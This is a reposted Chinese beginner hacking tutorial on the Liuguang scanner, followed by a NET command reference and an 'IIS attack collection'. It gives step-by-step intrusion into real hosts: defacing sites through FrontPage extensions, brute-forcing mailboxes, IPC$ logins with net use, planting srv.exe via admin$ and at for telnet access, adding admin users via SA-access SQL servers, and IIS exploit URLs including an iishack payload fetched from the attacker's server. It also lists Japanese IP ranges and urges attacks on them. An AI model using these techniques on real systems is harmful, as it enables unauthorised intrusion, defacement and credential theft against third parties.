日益深入 英文:[转载]流光的初级教程

教程一

前言：教程共分为如何利用FRONTPAGE EXTENDED PRIVILEGE HOLE入侵，如何用流光破解信箱，IPC$入侵全过程，SQL入侵全过程，以及通过一些漏洞入侵系统几大部分！我将循序渐进的教大家如何入侵主机，但是请不要入侵国内主机。这次带来的是第一部分，以后讲陆续给大家补充，希望大家有所收获！

声明一点，这是给和我一样的菜鸟看的文章，高手就不用看了！下面就开始吧！

1.当然是运行我们的流光拉！我用的是流光4.5，界面如下：

界面不错吧！推荐在2000下使用。

2.下面开始扫描了CTRL+R键得到下图：在开始地址填上你要扫描的IP地址，如果你在最后的IP上打上1的话，那流光就会自动扫描这个IP段的255台主机，扫描主机类型依你扫描的目的不同选择也就不同，我们这里要用的是NT/98，其他的就不用管他的了，点确定就开始了！没有打过补丁的溜光不能扫国内的主机，以免一些人拿流光来干坏事！我不推荐打补丁！因为会得到很多错误的结果！

下面我们就可以等待一会了！看了很多人的教程，等待的时候都说抽根烟等一会，可惜我不会抽烟，只有和大家闲聊几句，（别说我是唐僧哦*_*)呵呵！这不结果出来了。看吧！是不是很多结果 ：

主机前面的颜色，代表以下几个意思：

红色：该主机安装了FrontPage扩展。并没有权限设置。

蓝色：表示该主机上安装了FrontPage扩展

黑色：远程执行命令。你可以单击该主机---连接，就可以用DOS命令操作远程计算机，如：dir c:\

黄色：直接下载对方SAM文件（SAM文件是NT下储存用户和密码的文件，下载后来后用LC3可以解开）

绿色：将对方SAM文件上传到指定的FTP服务器

这是教程的第一章，将介绍扫描到的红色主机，其他的将在下次中写到！

3.打开我们的FrontPage，然后文件-----打开站点-----如图：

等待几秒，因为现在正在于服务器连接，读取对方的文件。如果好了的话的到下图：

这个时候你就可以直接修改他的主页了！这种方法很适合刚学黑的朋友们学习！因为比较简单，所以我把他设置在第一步！希望大家都已经学会了！快去扫小日本的主机去啊！自己再练习一下。

教程二

看过第一篇文章的朋友，不知道你是否成功了，下面我们就直接进入流光教程的第二步了！我们这次使用的是流光破解信箱密码，但我个人认为在破解信箱方面还是溯雪比较强，只是个人意见！流光适用于暴力破解信箱密码！我们这次的目标还是21CN，呵呵！因为这是网上最常见的信箱。下面就正式开始。

1.运行流光4.5,这是目前网上的最新版本3116，其次还有流光2915，2914！

下面就开始破解了，选择POP3主机------右键------编辑------ 添加，得到如下图片：

这里要破解的是21CN信箱所以填上：pop.21cn.com，其他的就用默认吧！不用更改，确定就行了！

来到下一步，还是右键------------从列表中添加------选择一个字典，因为这是破解信箱，用户名大多都是中文拼音，到网上下载一个这样的字典。

下面我们就可以用简单模式探测了！这样速度比较快！

如果不喜欢这样破解的话，你可以使用字典，我一般喜欢用流光目录下的CHIESE.DOC这个字典！ 字典添加方法如下图所示：

图中我是随便选择的一个字典，给大家做个示范而已！这里就已经添加好字典了！

下面就用标准模式来破解吧！好了！ 这篇文章的大体内容已经写出来了！大家多实践就明白了！最后给大家附上我找到的几个信箱的POP3地址：

SINA：pop3.sina.com.cn 网易：pop.163.com KM169:email.km169.net

其实一般都在网站上会注明的。不知道大家朋友们明白了没有！

教程三

这次我们要介绍的IPC$,这个功能98下是没有的！ 所以请使用98系统的朋友可以跳过这篇文章，或者赶快升级到WIN2000吧！都什么年代了，还在用98？而且2000的很多NET命令也不一样！

　　IPC$是共享“命名管道”的资源，它对于程序间的通讯很重要。在远程管理计算机和查看计算机的共享资源时使用。利用IPC$我们可以与目标主机建立一个空的连接（无需用户名与密码），而利用这个空的连接，我们就可以得到目标主机上的用户列表。用“流光”的IPC$探测功能，就可以得到用户列表了，并可以配合字典，进行密码尝试。

相信很多朋友都在扫描中遇到建立空连接成功，说的也就是这个了！

下面我们就全面开始：

运行流光！首先我们的确定一下我们的目标！ 因为我是斑竹，不能带大家去黑国内主机，而且我也不干这个，这次的目标就是小日本吧！台湾怎么说也是我们国家的一部分！哈哈！

IP地址：202.000.065.000 202.000.066.255 日本

IP地址：202.000.072.000 202.000.073.255 日本

IP地址：202.000.076.000 202.000.076.255 日本

IP地址：202.000.093.000 202.000.093.255 日本

IP地址：202.020.090.000 202.020.090.255 日本

IP地址：202.006.098.000 202.006.098.255 日本

IP地址：202.006.103.000 202.006.103.255 日本

IP地址：202.011.000.000 202.011.255.255 日本

IP地址：202.012.008.000 202.012.015.255 日本

IP地址：202.013.000.000 202.013.127.255 日本

IP地址：202.013.248.000 202.013.251.255 日本

IP地址：202.013.252.000 202.013.253.255 日本

IP地址：202.013.254.000 202.013.254.255 日本

IP地址：202.013.128.000 202.013.191.255 日本

IP地址：202.013.192.000 202.013.223.255 日本

IP地址：202.013.224.000 202.013.239.255 日本

IP地址：202.013.240.000 202.013.247.255 日本

IP地址：202.015.000.000 202.015.255.255 日本

IP地址：202.016.000.000 202.019.255.255 日本

这些就是小日本的地址段，大家可以随便填一段扫描了看！ 不过我更喜欢用GOOGLE搜索！不知道大家的喜爱了！下面就开始吧！

选择“探测”下的“扫描POP3/FTP/NT/SQL主机”，会出现“主机扫描设置”；在“扫描范围”中分别填写“开始地址”与“结束地址”，这里我分别填入了207.188.221.1和207.188.222.225；“扫描主机类型”选择“NT/98”.

如图所示：

等待一会，如果你的网速够快的话，结果很快就会出来了。

如上图所示，IPC主机下面已经得到很多结果了，下面主机前面的颜色，我在前面已经讲过了，这里再说一次。

红色：该主机安装了FrontPage扩展。并没有权限设置。

蓝色：表示该主机上安装了FrontPage扩展。

黑色：远程执行命令。你可以单击该主机---连接，就可以用DOS命令操作远程计算机，如：dir c:\

黄色：直接下载对方SAM文件（SAM文件是NT下储存用户和密码的文件，下载后来后用LC3可以解开）。

绿色：将对方SAM文件上传到指定的FTP服务器

上图中我已经得到了很多主机，日本真是笨啊！（其实国内的主机也好不到哪去）

下面我们开始探测IPC主机的用户了，

上图我已经很详细了吧！ 呵呵！ 不用我再多说了！来看结果吧！

是不是看到很多用户名字，FALLONP，Administrstor,都是超级用户，而且还有很多其他用户，如果我们不能直接探测到ADMIN的密码，我们还可以从其他用户下手，然后提升自己的权限！

下面的是引用一位朋友写的教程，因为过程都一样，所以我就不用去截图了！感谢这位朋友！

这时候我们运行win2000下的cmd.exe，打入命令：

net use \\IP地址\ipc$ “密码” /user: “用户名”

成功连接后显示命令成功完成

这时候你想干什么都可以了！哈哈！ 没有看见命令成功完成吗？

如果你想黑他页面的话找到他的网页所在的目录，如：c:\inetpub\wwwroot ，用命令:

copy c:\index.htm \\IP地址\c$\inetpub\wwwroot

这里的c:\index.htm指的是你作好的网页，上传替换掉原先的文件就可以改他的主页了，如果你想进一步登陆到他的服务器，那么我们要做的是传一个telnet服务器端上去，将telnet服务打开，找到流光目录tool文件夹下的sev.exe，将它复制到你的c盘，然后用命令：

copy c:\srv.exe \\IP地址\admin$ 意思是把本地C盘的srv.exe上传到服务器的system32目录下，我们在利

用win2000的时间计划来启动这个服务器端,首先要知道对方服务器的所在时间，用命令：

net time \\IP地址

可以得到时间

看到了吗？？ 对方的时间为2001年12月31日，上午06：36，这个时候要转换位24小时制，得到系统时间后，我们再用命令：

at \\IP地址 启动telnet的时间 srv.exe

成功的话显示填加任务完成：

用srv.exe打开的默认端口是99，听段音乐吧！等到时间后，我们就可以用命令:

telnet IP地址 99

远程登陆到服务器上了，成功登陆后，对方服务器的c:\winnt\system32\目录就在你眼前了 ，下面的事情不用我再教你了吧！

教程四

这次我们入侵的对象是SQL主机。因为这样的主机在网络也是经常见到的！

什么是SQL：

SQL：微软开发的数据库，专门用在微软的OS上，功能类似Linux 下的Mysql，晕……，到底谁类似谁啊？有时间去看看SQL的联机手册，说的很明白。

SQL服务程序支持的网络协议:

Named pipes :使用NT SMB端口来进行通信，存在被SNIFFER截获数据的危险。

IP Sockets :默认状态下开1433端口，可以被扫描器探测，存在被SNIFFER截获数据的危险。

Multi-Protocol ：客户端需要支持NT RPCs，数据加密。

NWLink ：存在被SNIFFER截获数据的危险。

AppleTalk (ADSP)：存在被SNIFFER截获数据的危险

Banyan Vines ：存在被SNIFFER截获数据的危险

在Internet上，95％以上的SQL Server 采用的都是IP Sockets协议，流光探测的就是这个协议默认的1433端口。

按CTRL+R得到下图：

在开始地址上填写：要扫描的IP地址

在结束地址处填写：结束IP地址

这样的话目标广一些，扫到的主机也多一些

我们这里的目标是SQL主机，当然在扫描主机类型选择：SQL

其他的不变，就用默认的吧！ 不会的话看我上面的截图！

确定以后开始扫描，来听一首吧！

得到结果如图：

探测到的SQL主机会自动添加到MSSQL主机中，金色的头像表示有漏洞，我们能够进入！

看见了吗？？呵呵！ 下面让我们进入吧！

我们的先提升建立一个属于自己的用户名，并且把这个用户加到ADMIN组中去！

这里我们要用到NET命令，这个命令在我文章的附录中提到，如果不会的朋友可以先看看NET命令的用法！

或则这样连接：快捷键：CTRL+Q

这个就是我刚才扫描到的主机，就是上面图显示的那个！连接吧！用户名是SA，密码是：DCS123上面有了！

下面我要的命令是：

net user aoqixiongying /add 建立一个名叫aoqixiongying的用户名

net user aoqixiongying 123456 设置aoqixiongying的密码为：123456

net localgroup administrator aoqixiongying /add 把aoqixiongying添加到管理员组中去。

如下图所示：

看到了吗？？下面我们要打开服务器的TELNET服务

命令NET START “TELNET”

如图：

这下我们就可以TELNET上去了！而且还是管理员

如图：开始-----------运行-----------telnet

接下来就是：open

连接到的IP地址

得到下图：

这里的LOGIN添入我们刚才建立的用户名，当然是我的名字aoqixiongying

PASSWPRD添入：刚才的密码123456

这里是给大家朋友演示，所以我用了我网名的拼音，呵呵！ 你可千万不要用自己的名字啊，尤其是在国内主机上面，不然我们又可以见到XX地区我神勇刑警抓获一白痴黑客，呵呵！ 希望这个人不是你！

呵呵！ 这里的C盘其实就是对方服务器的吧！ 该干什么不用我再说了吧！ 自己去吧！

全文完！

(附)

一.NET命令详细使用方法

这篇文章综合了WINDOWS 98，WINDOWS WORKSTATION和WINDOWS SERVER 三个操作系统关于NET命令的解释，希望可以全面一些先说一些：

(1)NET命令是一个命令行命令。

(2)管理网络环境、服务、用户、登陆。。。。等本地信息

(3)WIN 98，WIN WORKSTATION和WIN NT都内置了NET命令。

(4)但WIN 98的NET命令和WORKSTATION、NT的NET命令不同。

(5)WORKSTATION和SERVER中的NET命令基本相同。

(6)获得HELP

在NT下可以用图形的方式，开始-》帮助-》索引-》输入NET

在COMMAND下可以用字符方式，NET /?或NET或NET HELP得到一些方法 相应的方法的帮助NET COMMAND /HELP或NET HELP COMMAND 或NET COMMAND /另对于错误NET HELPMSG MESSAGE#是4位数

(7)强制参数 所有net命令接受选项/yes和/no(可缩写为/y和/n)。[简单的说就是预先给系统的 提问一个答案]

(8)有一些命令是马上产生作用并永久保存的，使用的时候要慎重

(9)对于NET命令的功能都可以找到相应的图形工具的解决方案

(10)命令的组成 命令 参数 选项 | 参数 选项 | 参数 选项 |。。。。。。

瘰疬罗嗦说了一大堆，其实就是6和7有用，呵呵 另有两件事：

(1)在NT的NET命令中有一些参数是只有在SERVER环境中才能使用的

(2)在WIN98的NET命令中有一些参数不能在DOS-WIN中使用，只能在DOS环境中使用

下面对NET命令的不同参数的基本用法做一些初步的介绍：

(1)NET VIEW?

作 用：显示域列表、计算机列表或指定计算机的共享资源列表。

命令格式：net view [\\computername | /domain[:domainname]]

参数介绍：?

键入不带参数的net view显示当前域的计算机列表。

\\computername 指定要查看其共享资源的计算机。

/domain[:domainname]指定要查看其可用计算机的域简单事例?

net view \\YFANG查看YFANG的共享资源列表。

net view /domain:LOVE查看LOVE域中的机器列表。

(2)NET USER

作 用：添加或更改用户帐号或显示用户帐号信息。该命令也可以写为 net users。

命令格式：net user [username [password | *] [options]] [/domain]

参数介绍:

键入不带参数的net user查看计算机上的用户帐号列表。

username添加、删除、更改或查看用户帐号名。

password为用户帐号分配或更改密码。

*提示输入密码。

/domain在计算机主域的主域控制器中执行操作。?

简单事例：?

net user yfang查看用户YFANG的信息?

(3)NET USE?

作用：连接计算机或断开计算机与共享资源的连接，或显示计算机的连接信息。

命令格式：net use [devicename | *] [\\computername\sharename[\volume]]?

[password | *]] [/user:[domainname\]username] [[/delete] |

[/persistent:{yes | no}]]

参数介绍：

键入不带参数的net use列出网络连接。

devicename指定要连接到的资源名称或要断开的设备名称。

\\computername\sharename服务器及共享资源的名称。

password访问共享资源的密码。

*提示键入密码。 /user指定进行连接的另外一个用户。

domainname指定另一个域。

username指定登录的用户名。

/home将用户连接到其宿主目录

/delete取消指定网络连接。

/persistent控制永久网络连接的使用。

简单事例：

net use e: \\YFANG\TEMP将\\YFANG\TEMP目录建立为E盘

net use e: \\YFANG\TEMP /delete断开连接

(4)NET TIME?

作 用：使计算机的时钟与另一台计算机或域的时间同步。

命令格式：net time [\\computername | /domain[:name]] [/set]

参数介绍：

\\computername要检查或同步的服务器名。

/domain[:name]指定要与其时间同步的域。

/set使本计算机时钟与指定计算机或域的时钟同步。

下面的这4个参数是相关的，所以一起介绍

(5)Net Start

作 用：启动服务，或显示已启动服务的列表。

命令格式：net start service

(6)Net Pause

作 用：暂停正在运行的服务。

命令格式：net pause service

(7)Net Continue?

作 用：重新激活挂起的服务。

命令格式：net continue service

(8)NET STOP

作 用：停止 Windows NT 网络服务。

命令格式：net stop service

参数介绍：我们来看看这些服务都是什么

alerter(警报)

client service for netware(Netware 客户端服务)

clipbook server(剪贴簿服务器)

computer browser(计算机浏览器)

directory replicator(目录复制器)

ftp publishing service (ftp )(ftp 发行服务)

lpdsvc

net logon(网络登录) network dde网络 dde)

network dde dsdm(网络 dde dsdm)

network monitor agent(网络监控代理)

nt lm security support provider(NT LM 安全性支持提供)

ole(对象链接与嵌入)

remote access connection manager(远程访问连接管理器)

remote access isnsap service(远程访问 isnsap 服务)

remote access server(远程访问服务器)

remote procedure call (rpc) locator(远程过程调用定位器)

remote procedure call (rpc) service(远程过程调用服务)

schedule(调度)

server(服务器)

simple tcp/ip services(简单 TCP/IP 服务)

snmp

spooler(后台打印程序)

tcp/ip netbios helper(TCP/IP NETBIOS 辅助工具)

ups (26)workstation(工作站)

messenger(信使)

dhcp client

eventlog 以下这些SERVICE只能在NT SERVER上使用

>)file server for macintosh

>gateway service for netware

>microsoft dhcp server

>print server for macintosh

>remoteboot

>windows internet name service

(9)Net Statistics

作 用：显示本地工作站或服务器服务的统计记录。

命令格式：net statistics [workstation | server]

参数介绍：

键入不带参数的net statistics列出其统计信息可用的运行服务。

workstation显示本地工作站服务的统计信息。

server显示本地服务器服务的统计信息。

简单事例:

net statistics server | more显示服务器服务的统计信息

(10)Net Share

作 用：创建、删除或显示共享资源。

命令格式：net share sharename=drive:path [/users:number | /unlimited]

[/remark:"text"]

参数介绍：?

键入不带参数的net share显示本地计算机上所有共享资源的信息。

sharename是共享资源的网络名称。

drive:path指定共享目录的绝对路径。

/users:number设置可同时访问共享资源的最大用户数。

/unlimited不限制同时访问共享资源的用户数。

/remark:"text "添加关于资源的注释，注释文字用引号引住。

简单事例：

net share mylove=c:\temp /remark:"my first share"以mylove为共享名共享

C:\temp

net share mylove /delete停止共享mylove目录?

(11)Net Session?

作 用：列出或断开本地计算机和与之连接的客户端的会话，也可以写为net?

sessions或net sess。

命令格式：net session [\\computername] [/delete]

参数介绍：

键入不带参数的net session显示所有与本地计算机的会话的信息。

\\computername标识要列出或断开会话的计算机。

/delete结束与\\computername计算机会话并关闭本次会话期间计算机的所有

简单事例：

net session \\YFANG要显示计算机名为YFANG的客户端会话信息列表。

(12)Net Send

作 用：向网络的其他用户、计算机或通信名发送消息。

命令格式：net send {name | * | /domain[:name] | /users} message 参数介绍：

name要接收发送消息的用户名、计算机名或通信名。

*将消息发送到组中所有名称。

/domain[:name]将消息发送到计算机域中的所有名称。

/users将消息发送到与服务器连接的所有用户。

message作为消息发送的文本。

简单事例：

net send /users server will shutdown in 5 minutes. 给所有连接到服务器的用户发送消息

(13)Net Print

作 用：显示或控制打印作业及打印队列。

命令格式：net print [\\computername ] job# [/hold | /release |

/delete]

参数介绍：

computername共享打印机队列的计算机名。

sharename打印队列名称。

job#在打印机队列中分配给打印作业的标识号。

/hold使用 job# 时，在打印机队列中使打印作业等待。

/release释放保留的打印作业。

/delete从打印机队列中删除打印作业。

简单事例：

net print \\YFANG\SEEME列出\\YFANG计算机上SEEME打印机队列的目录

(14)Net Name

作 用：添加或删除消息名（有时也称别名），或显示计算机接收消息的名称列表。

命令格式：net name [name [/add | /delete]]

参数介绍：

键入不带参数的net name列出当前使用的名称。

name指定接收消息的名称。

/add将名称添加到计算机中。

/delete从计算机中删除名称。

(15)Net Localgroup

作 用：添加、显示或更改本地组。

命令格式：net localgroup groupname {/add [/comment:"text "] | /delete}?

[/domain]

参数介绍：

键入不带参数的net localgroup显示服务器名称和计算机的本地组名称。

groupname要添加、扩充或删除的本地组名称。

/comment: "text "为新建或现有组添加注释。

/domain在当前域的主域控制器中执行操作，否则仅在本地计算机上执行操作

name [ ...]列出要添加到本地组或从本地组中删除的一个或多个用户名或组名。

/add将全局组名或用户名添加到本地组中。

/delete从本地组中删除组名或用户名。

简单事例：

net localgroup love /add将名为love的本地组添加到本地用户帐号数据库

net localgroup love显示love本地组中的用户

(16)Net Group

作 用：在 Windows NT Server 域中添加、显示或更改全局组。

命令格式：net group groupname {/add [/comment:"text "] | /delete}[/domain]

参数介绍：

键入不带参数的net group显示服务器名称及服务器的组名称。

groupname要添加、扩展或删除的组。

/comment:"text "为新建组或现有组添加注释。 /domain在当前域的主域控

制器中执行该操作，否则在本地计算机上执行操作

username[ ...]列表显示要添加到组或从组中删除的一个或多个用户。

/add添加组或在组中添加用户名。

/delete删除组或从组中删除用户名。

简单事例：

net group love yfang1 yfang2 /add将现有用户帐号yfang1和yfang2添加到本

地计算机的love组

(17)Net File

作 用：显示某服务器上所有打开的共享文件名及锁定文件数。

命令格式：net file [id [/close]]

参数介绍：

键入不带参数的net file获得服务器上打开文件的列表。

id文件标识号。

/close关闭打开的文件并释放锁定记录。

(18)Net Config

作 用：显示当前运行的可配置服务，或显示并更改某项服务的设置。

命令格式：net config [service [options]]

参数介绍：

键入不带参数的net config显示可配置服务的列表。

service通过net config命令进行配置的服务(server或workstation)

options服务的特定选项。

(19)Net Computer

作 用：从域数据库中添加或删除计算机。

命令格式：net computer \\computername {/add | /del}

参数介绍：

\\computername指定要添加到域或从域中删除的计算机。

/add将指定计算机添加到域。

/del将指定计算机从域中删除。

简单事例：

net computer \\cc /add将计算机 cc 添加到登录域

(20)Net Accounts?

作 用：更新用户帐号数据库、更改密码及所有帐号的登录要求。

命令格式：net accounts [/forcelogoff:{minutes | no}] [/minpwlen:

length] [/maxpwage:{days | unlimited}] [/minpwage:days] [/uniquepw:

number] [/domain]

参数介绍：

键入不带参数的net accounts显示当前密码设置、登录时限及域信息。

/forcelogoff:{minutes | no}设置当用户帐号或有效登录时间过期时

/minpwlen:length设置用户帐号密码的最少字符数。

/maxpwage:{days | unlimited}设置用户帐号密码有效的最大天数。

/minpwage:days设置用户必须保持原密码的最小天数。

/uniquepw:number要求用户更改密码时，必须在经过number次后才能重复使用与之相同的密码。

/domain在当前域的主域控制器上执行该操作。

/sync当用于主域控制器时，该命令使域中所有备份域控制器同步

简单事例：

net accounts /minpwlen:7

将用户帐号密码的最少字符数设置为7

上面介绍的是NET命令在WINNT下的基本用法，下面我们看看NET命令在WIN98下的基本用法。在WIN98中NET命令也有一些参数 其中有一些参数的名字和功能及简单的使用方法和WINNT下的相应的参数的用法相同，其中有

(1)NET TIME命令

(2)NET PRINT命令

(3)NET USE命令

(4)NET VIEW命令

在WIN98中NET命令有一些参数 其中有一些参数的名字和WINNT下的相应的参数的名字相同但其用法却有些不同，其中有

(1)NET START

作 用：启动相应的服务。(不能在DOS-WIN中用)

命令格式：NET START [BASIC | NWREDIR | WORKSTATION | NETBIND | NETBEUI |NWLINK] [/LIST] [/YES] [/VERBOSE]

(2)NET STOP

作 用：停止相应的服务.(不能在DOS-WIN中用)

命令格式：NET STOP [BASIC | NWREDIR | WORKSTATION | NETBEUI | NWLINK][/YES]

在WIN98中NET命令还有一些参数是在98下才有的，其中有

(1)NET DIAG

作 用：运行MS的DIAGNOSTICS程序显示网络的DIAGNOSTIC信息

命令格式：NET DIAGNOSTICS [/NAMES | /STATUS]

(2)NET INIT

作 用：不通过绑定来加载协议或网卡驱动(不能在DOS-WIN中用)

命令格式：NET INITIALIZE [/DYNAMIC]

(3)NET LOGOFF

作 用：断开连接的共享资源(不能在DOS-WIN中用)

(4)NET LOGON

作 用：在WORKGROUP中登陆(不能在DOS-WIN中用)

命令格式：NET LOGON [user [password | ?]] [/DOMAIN:name] [/YES][/SAVEPW:NO]

(5)NET PASSWORD

作 用：更改你的网络登陆口令(不能在DOS-WIN中用)

命令格式：NET PASSWORD \\computer | /DOMAIN:name [user [oldpassword?

[newpassword]]]

二.IIS攻击大全

这里介绍的方法主要通过端口80来完成操作，具有很大的威胁性，因为作为网络服务器80端口总要打开的。如果想方便一些，下载一些WWW、CGI扫描器来辅助检查。

　　而且要知道目标机器运行的是何种服务程序，你可以使用以下命令：

telnet 《目标机》 80

GET HEAD / HTTP/1.0

就可以返回一些域名和WEB服务程序版本，如果有些服务器把WEB服务运行在8080，81，8000，8001口，你就TELNET相应的口上。

2.常见漏洞

（1）、Null.htw

　　IIS如果运行了Index Server就包含了一个通过Null.htw有关的漏洞，即服务器上不存在此.htw结尾的文件。这个漏洞会导致显示ASP脚本的源代码， global.asa里面包含了用户帐户等敏感信息。如果攻击者提供特殊的URL请求给IIS就可以跳出虚拟目录的限制，进行逻辑分区和ROOT目录的访问。而这个"hit-highlighting"功能在Index Server中没有充分防止各种类型文件的请求，所以导致攻击者访问服务器上的任意文件。Null.htw功能可以从用户输入中获得3个变量：

CiWebhitsfile

CiRestriction

CiHiliteType

　　你可通过下列方法传递变量来获得如default.asp的源代码：

http://www.目标机.com/null.htw?CiWebhitsfile=/default.asp%20&%20

CiRestriction=none%20&%20&CiHiliteType=full其中不需要一个合法的.htw文件是因为虚拟文件已经存储在内存中了。

（2）、MDAC- 执行本地命令漏洞

　　这个漏洞出现得比较早，但在全球范围内，可能还有好多IIS WEB服务器存在这个漏洞，就像在今天，还有很多人在用Windows3.2一样。IIS的MDAC组件存在一个漏洞，可以导致攻击者远程执行目标系统的命令。主要核心问题是存在于RDSDatafactory，默认情况下，它允许远程命令发送到IIS服务器中，这命令会以设备用户的身份运行，在默认情况下是SYSTEM用户。我们可以通过以下办法测试本机是否存在这个漏洞：

c:\》nc -nw -w 2 《目标机》 80

GET /msadc/msadcs.dll HTTP

　　如果你得到下面的信息：

application/x_varg

　　就很有可能存在此漏洞且没有打上补丁，你可以使用rain forest puppy网站的两个程序进行测(www.wiretrip.net/rfp)==》mdac.pl和msadc2.pl。

（3）、ASP Dot Bug

　　这个漏洞出现得比较早了，是Lopht小组在1997年发现的缺陷，这个漏洞也是泄露ASP源代码给攻击者，一般在IIS3.0上存在此漏洞，在请求的URL结尾追加一个或者多个点导致泄露ASP源代码。http://www.目标机.com/sample.asp.

（4）、idc & .ida Bugs

　　这个漏洞实际上类似ASP dot 漏洞，其能在IIS4.0上显示其WEB目录信息，很奇怪有些人还在IIS5.0上发现过此类漏洞，通过增加?idc?或者?ida?后缀到URL会导致IIS尝试允许通过数据库连接程序.DLL来运行.IDC，如果此.idc不存在，它就返回一些信息给客户端。

http://www.目标机.com/anything.idc 或者 anything.idq

（5）、+.htr Bug

　　这个漏洞是由NSFOCUS发现的，对有些ASA和ASP追加+.htr的URL请求就会导致文件源代码的泄露：

http://www.目标机.com/global.asa+.htr

（6）、NT Site Server Adsamples 漏洞

　　通过请求site.csc，一般保存在/adsamples/config/site.csc中，攻击者可能获得一些如数据库中的DSN，UID和PASS的一些信息，如：

http://www.目标机.com/adsamples/config/site.csc

（7）、IIS HACK

　　有人发现了一个IIS4.0的缓冲溢出漏洞，可以允许用户上载程序，如上载netcat到目标服务器，并把cmd.exe绑定到80端口。这个缓冲溢出主要存在于.htr,.idc和.stm文件中，其对关于这些文件的URL请求没有对名字进行充分的边界检查，导致运行攻击者插入一些后门程序在系统中下载和执行程序。要检测这样的站点你需要两个文件iishack.exe，ncx.exe，你可以到站点www.technotronic.com中去下载，另外你还需要一台自己的WEB服务器，也可以是虚拟服务器哦。你现在你自己的WEB服务器上运行WEB服务程序并把ncx.exe放到你自己相应的目录下，然后使用iishack.exe来检查目标机器：

c:\》iishack.exe 《目标机》 80 《你的WEB服务器》/ncx.exe

　　然后你就使用netcat来连接你要检测的服务器：

c:\》nc 《目标机》 80

　　如果溢出点正确，你就可以看到目标机器的命令行提示，并且是远程管理权限。Codebrws.asp & Showcode.asp 。Codebrws.asp和Showcode.asp在IIS4.0中是附带的看文件的程序，但不是默认安装的，这个查看器是在管理员允许查看样例文件作为联系的情况下安装的。但是，这个查看器并没有很好地限制所访问的文件，远程攻击者可以利用这个漏洞来查看目标机器上的任意文件内容，但要注意以下几点：

1．Codebrws.asp 和 Showcode.asp默认情况下不安装。

2．漏洞仅允许查看文件内容。

3．这个漏洞不能绕过WINDOWS NT的ACL控制列表的限制。

4．只允许同一分区下的文件可以被查看(所以把IIS目录和WINNT分区安装是个不错的方案，这样也可能比较好的防止最新的IIS5.0的unicode漏洞).

5,攻击者需要知道请求的文件名。

　　例如你发现存在这个文件并符合上面的要求，你可以请求如下的命令：

http://www.目标机.com/iisamples/exair/howitworks/codebrws.asp?source=/

iisamples/exair/howitworks/codebrws.asp

你就可以查看到codebrws.asp的源代码了。

你也可以使用showcode.asp来查看文件：

http://www.目标机.com/msadc/samples/selector/showcode.asp?

source=/msadc/../../../../../winnt/win.ini

　　当然你也可以查看一些FTP信息来获得其他的目标管理员经常使用的机器，或许其他的机器的安全性比WEB服务器差，如：

http://xxx.xxx.xxx.xxx/msadc/Samples/SELECTOR/showcode.asp?

source=/msadc/Samples/../../../../../winnt/system32/logfiles/MSFTPSVC1/ex000517.log

（8）、webhits.dll & .htw

　　这个hit-highligting功能是由Index Server提供的允许一个WEB用户在文档上highlighted（突出）其原始搜索的条目，这个文档的名字通过变量CiWebhitsfile传递给.htw文件，Webhits.dll是一个ISAPI应用程序来处理请求，打开文件并返回结果，当用户控制了CiWebhitsfile参数传递给.htw时，他们就可以请求任意文件，结果就是导致可以查看ASP源码和其他脚本文件内容。要了解你是否存在这个漏洞，你可以请求如下条目：

http://www.目标机.com/nosuchfile.htw

　　如果你从服务器端获得如下信息：

format of the QUERY_STRING is invalid

这就表示你存在这个漏洞。

　　这个问题主要就是webhits.dll关联了.htw文件的映射，所以你只要取消这个映射就能避免这个漏洞，你可以在你认为有漏洞的系统中搜索.htw文件，一般会发现如下的程序：

/iissamples/issamples/oop/qfullhit.htw

/iissamples/issamples/oop/qsumrhit.htw

/isssamples/exair/search/qfullhit.htw

/isssamples/exair/search/qsumrhit.htw

/isshelp/iss/misc/iirturnh.htw (这个一般为loopback使用)

　　攻击者可以使用如下的方法来访问系统中文件的内容：

http://www.目标机.com/iissamples/issamples/oop/qfullhit.htw?

ciwebhitsfile=/../../winnt/win.ini&cirestriction=none&cihilitetype=full

　　就会在有此漏洞系统中win.ini文件的内容。

（9）、ASP Alternate Data Streams(::$DATA)

　　$DATA这个漏洞是在1998年中期公布的，$DATA是在NTFS文件系统中存储在文件里面的main data stream属性，通过建立一个特殊格式的URL，就可能使用IIS在浏览器中访问这个data stream(数据流)，这样做也就显示了文件代码中这些data stream(数据流)和任何文件所包含的数据代码。

　　其中这个漏洞需要下面的几个限制，一个是要显示的这个文件需要保存在NTFS文件分区(幸好为了"安全"好多服务器设置了NTFS格式)，第二是文件需要被ACL设置为全局可读。而且未授权用户需要知道要查看文件名的名字，WIN NT中的IIS1.0, 2.0, 3.0和4.0都存在此问题。微软提供了一个IIS3.0和4.0的版本补丁，

要查看一些.asp文件的内容，你可以请求如下的URL：

　　http://www.目标机.com/default.asp::$DATA 你就得到了源代码。你要了解下NTFS文件系统中的数据流问题，你或许可以看看这文章：

http://focus.silversand.net/newsite/skill/ntfs.txt

（10）、ISM.DLL 缓冲截断漏洞

　　这个漏洞存在于IIS4.0和5.0中，允许攻击者查看任意文件内容和源代码。通过在文件 名后面追加近230个+或者?%20?(这些表示空格)并追加?.htr?的特殊请求给IIS，会使IIS认为客户端请求的是?.htr?文件，而.htr文件的后缀映射到ISM.DLL ISAPI应用程序，这样IIS就把这个.htr请求转交给这个DLL文件，然后ISM.DLL程序把传递过来的文件打开和执行，但在ISM.DLL 截断信息之前,缓冲区发送一个断开的 .Htr 并会延迟一段时间来返回一些你要打开的文件内容。可是要注意，除非 WEB 服务停止并重启过，否则这攻击只能有效执行一次。如果已经发送过一个 .htr 请求到机器上,那么这攻击会失效.它只能在 ISM.DLL 第一次装入内存时工作。

http://www.目标机.com/global.asa%20%20(...《=230)global.asa.htr

（11）、存在的一些暴力破解威胁.htr程序

　　IIS4.0中包含一个严重漏洞就是允许远程用户攻击WEB服务器上的用户帐号，就是你的WEB服务器是通过NAT来转换地址的，还可以被攻击。每个IIS4.0安装的时候建立一个虚拟目录/iisadmpwd，这个目录包含多个.htr文件，匿名用户允许访问这些文件，这些文件刚好没有规定只限制在loopback addr(127.0.0.1)，请求这些文件就跳出对话框让你通过WEB来修改用户的帐号和密码。这个目录物理映射在下面的目录下：

c:\winnt\system32\inetsrv\iisadmpwd

Achg.htr

Aexp.htr

Aexp2.htr

Aexp2b.htr

Aexp3.htr

Aexp4.htr

Aexp4b.htr

Anot.htr

Anot3.htr

这样，攻击者可以通过暴力来猜测你的密码。如果你没有使用这个服务，请立即删除这个目录。

（12）、Translate:f Bug

